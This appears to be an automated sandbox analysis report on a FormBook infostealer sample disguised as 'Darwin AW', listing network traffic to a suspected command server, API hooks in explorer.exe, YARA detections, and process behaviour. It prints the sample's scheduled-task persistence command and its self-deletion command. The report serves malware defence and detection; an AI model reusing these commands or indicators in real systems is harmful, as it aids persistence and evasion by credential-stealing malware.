                                        RT_VERSION0x1287440x33cdata
                                        RT_MANIFEST0x128a800x9b0XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright F@Soft
                                        Assembly Version1.0.6.2
                                        InternalNameDirectoryStri.exe
                                        FileVersion1.0.6.0
                                        CompanyNameF@Soft
                                        LegalTrademarks
                                        Comments
                                        ProductNameDarwin AW
                                        ProductVersion1.0.6.0
                                        FileDescriptionDarwin AW
                                        OriginalFilenameDirectoryStri.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 27, 2021 14:53:50.245162010 CEST4985280192.168.2.491.237.52.145
                                        Sep 27, 2021 14:53:53.252325058 CEST4985280192.168.2.491.237.52.145
                                        Sep 27, 2021 14:53:53.295085907 CEST804985291.237.52.145192.168.2.4
                                        Sep 27, 2021 14:53:53.295651913 CEST4985280192.168.2.491.237.52.145
                                        Sep 27, 2021 14:53:53.295681000 CEST4985280192.168.2.491.237.52.145
                                        Sep 27, 2021 14:53:53.338730097 CEST804985291.237.52.145192.168.2.4
                                        Sep 27, 2021 14:53:53.338773966 CEST804985291.237.52.145192.168.2.4
                                        Sep 27, 2021 14:53:53.338789940 CEST804985291.237.52.145192.168.2.4
                                        Sep 27, 2021 14:53:53.339176893 CEST4985280192.168.2.491.237.52.145
                                        Sep 27, 2021 14:53:53.367613077 CEST4985280192.168.2.491.237.52.145
                                        Sep 27, 2021 14:53:53.410270929 CEST804985291.237.52.145192.168.2.4

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 27, 2021 14:51:54.994518995 CEST5309753192.168.2.48.8.8.8
                                        Sep 27, 2021 14:51:55.025773048 CEST53530978.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:27.672146082 CEST4925753192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:27.705750942 CEST53492578.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:47.060364008 CEST6238953192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:47.078507900 CEST53623898.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:47.148010015 CEST4991053192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:47.210721016 CEST53499108.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:47.793194056 CEST5585453192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:47.869272947 CEST53558548.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:48.238492012 CEST6454953192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:48.273530960 CEST53645498.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:48.651422977 CEST6315353192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:48.665143013 CEST53631538.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:49.097857952 CEST5299153192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:49.161163092 CEST53529918.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:49.975158930 CEST5370053192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:49.989016056 CEST53537008.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:50.565321922 CEST5172653192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:50.578814030 CEST53517268.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:51.157911062 CEST5679453192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:51.241772890 CEST53567948.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:52.336307049 CEST5653453192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:52.349224091 CEST53565348.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:53.496551991 CEST5662753192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:53.509587049 CEST53566278.8.8.8192.168.2.4
                                        Sep 27, 2021 14:52:54.098185062 CEST5662153192.168.2.48.8.8.8
                                        Sep 27, 2021 14:52:54.111202955 CEST53566218.8.8.8192.168.2.4
                                        Sep 27, 2021 14:53:06.958460093 CEST6311653192.168.2.48.8.8.8
                                        Sep 27, 2021 14:53:06.982157946 CEST53631168.8.8.8192.168.2.4
                                        Sep 27, 2021 14:53:39.562196970 CEST6407853192.168.2.48.8.8.8
                                        Sep 27, 2021 14:53:39.595563889 CEST53640788.8.8.8192.168.2.4
                                        Sep 27, 2021 14:53:40.552614927 CEST6480153192.168.2.48.8.8.8
                                        Sep 27, 2021 14:53:40.587773085 CEST53648018.8.8.8192.168.2.4
                                        Sep 27, 2021 14:53:50.157510996 CEST6172153192.168.2.48.8.8.8
                                        Sep 27, 2021 14:53:50.237306118 CEST53617218.8.8.8192.168.2.4
                                        Sep 27, 2021 14:54:10.915993929 CEST5125553192.168.2.48.8.8.8
                                        Sep 27, 2021 14:54:10.945149899 CEST53512558.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Sep 27, 2021 14:53:50.157510996 CEST192.168.2.48.8.8.80xd0c6Standard query (0)www.zaborski.proA (IP address)IN (0x0001)
                                        Sep 27, 2021 14:54:10.915993929 CEST192.168.2.48.8.8.80xf8fcStandard query (0)www.desireezzplus.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Sep 27, 2021 14:53:50.237306118 CEST8.8.8.8192.168.2.40xd0c6No error (0)www.zaborski.pro91.237.52.145A (IP address)IN (0x0001)
                                        Sep 27, 2021 14:54:10.945149899 CEST8.8.8.8192.168.2.40xf8fcNo error (0)www.desireezzplus.comdesireezzplus.comCNAME (Canonical name)IN (0x0001)
                                        Sep 27, 2021 14:54:10.945149899 CEST8.8.8.8192.168.2.40xf8fcNo error (0)desireezzplus.com66.254.114.234A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.zaborski.pro

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.44985291.237.52.14580C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Sep 27, 2021 14:53:53.295681000 CEST5656OUTGET /gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb HTTP/1.1
                                        Host: www.zaborski.pro
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Sep 27, 2021 14:53:53.338773966 CEST5657INHTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 707
                                        date: Mon, 27 Sep 2021 12:53:53 GMT
                                        server: LiteSpeed
                                        location: https://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb
                                        vary: User-Agent,Accept-Encoding
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE1
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE1
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE1
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE1

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: 456yqMyHvT.exe PID: 6332 Parent PID: 6824

                                        General

                                        Start time:14:52:00
                                        Start date:27/09/2021
                                        Path:C:\Users\user\Desktop\456yqMyHvT.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\456yqMyHvT.exe'
                                        Imagebase:0xd20000
                                        File size:1205248 bytes
                                        MD5 hash:001122F11AE95A3C00EB3E76541BC264
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        Analysis Process: schtasks.exe PID: 6564 Parent PID: 6332

                                        General

                                        Start time:14:52:20
                                        Start date:27/09/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'
                                        Imagebase:0xc0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: conhost.exe PID: 3184 Parent PID: 6564

                                        General

                                        Start time:14:52:21
                                        Start date:27/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: 456yqMyHvT.exe PID: 5188 Parent PID: 6332

                                        General

                                        Start time:14:52:21
                                        Start date:27/09/2021
                                        Path:C:\Users\user\Desktop\456yqMyHvT.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\456yqMyHvT.exe
                                        Imagebase:0x6a0000
                                        File size:1205248 bytes
                                        MD5 hash:001122F11AE95A3C00EB3E76541BC264
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 5188

                                        General

                                        Start time:14:52:22
                                        Start date:27/09/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff6fee60000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        Reputation:high

                                        Analysis Process: WWAHost.exe PID: 3040 Parent PID: 3424

                                        General

                                        Start time:14:53:02
                                        Start date:27/09/2021
                                        Path:C:\Windows\SysWOW64\WWAHost.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                        Imagebase:0x1190000
                                        File size:829856 bytes
                                        MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Analysis Process: cmd.exe PID: 2440 Parent PID: 3040

                                        General

                                        Start time:14:53:07
                                        Start date:27/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: conhost.exe PID: 4692 Parent PID: 2440

                                        General

                                        Start time:14:53:07
                                        Start date:27/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >